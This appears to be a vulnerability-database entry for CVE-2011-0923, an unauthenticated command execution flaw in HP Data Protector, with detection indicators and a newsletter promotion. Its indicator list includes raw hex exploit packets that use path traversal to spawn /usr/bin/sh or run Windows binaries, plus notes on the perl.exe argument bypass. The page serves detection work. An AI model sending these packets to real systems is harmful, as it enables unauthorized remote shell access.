cbcvebase.
CVE-2011-0923
published 2011-02-09

CVE-2011-0923: The client in HP Data Protector does not properly validate EXEC_CMD arguments, which allows remote attackers to execute arbitrary Perl code via a crafted…

PriorityP276critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
81.08%
99.6th percentile
The client in HP Data Protector does not properly validate EXEC_CMD arguments, which allows remote attackers to execute arbitrary Perl code via a crafted command, related to the "local bin directory."

Detection & IOCsextracted from sources · hover to see the quote

port5555
path../../../../../../../../../../bin/sh
processomniinet.exe
bytes
\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00
bytes
\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00
  • Monitor TCP port 5555 for connections to the HP Data Protector omniinet service; exploit traffic targets this port exclusively.
  • Detect EXEC_CMD packets containing path traversal sequences (e.g., '../../') in the payload sent to port 5555; the traversal is used to reach arbitrary binaries outside the Data Protector bin directory.
  • On Linux/HP-UX targets, alert on EXEC_CMD packets that resolve to '/bin/sh' or '/usr/bin/sh' via traversal; this indicates an attempt to spawn a root shell.
  • On Windows targets, detect EXEC_CMD packets referencing 'perl.exe' with inline '-esystem()' arguments; this is the technique used to bypass single-command-only restrictions and execute arbitrary commands.
  • Flag omniinet.exe spawning unexpected child processes (e.g., cmd.exe, perl.exe, sh) as this indicates successful EXEC_CMD exploitation.
  • Look for the 4-byte big-endian length prefix '\x00\x00\x00\xa4' at the start of TCP payloads on port 5555 combined with the '\x20\x32' opcode bytes as a signature for known EXEC_CMD exploit packets.
  • ·On Windows, omniinet.exe uses FindFirstFileW() to validate the filename before execution; if the file is not found, exploitation fails. Attackers must supply a valid path to an existing binary (e.g., perl.exe within the Data Protector install path).
  • ·The Windows EXEC_CMD variant cannot pass arguments directly to arbitrary binaries; the perl.exe trick is required to execute commands with parameters, as the base path begins under C:\.
  • ·The exploit is unauthenticated; no credentials are required to send a malicious EXEC_CMD packet to the omniinet service on port 5555.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.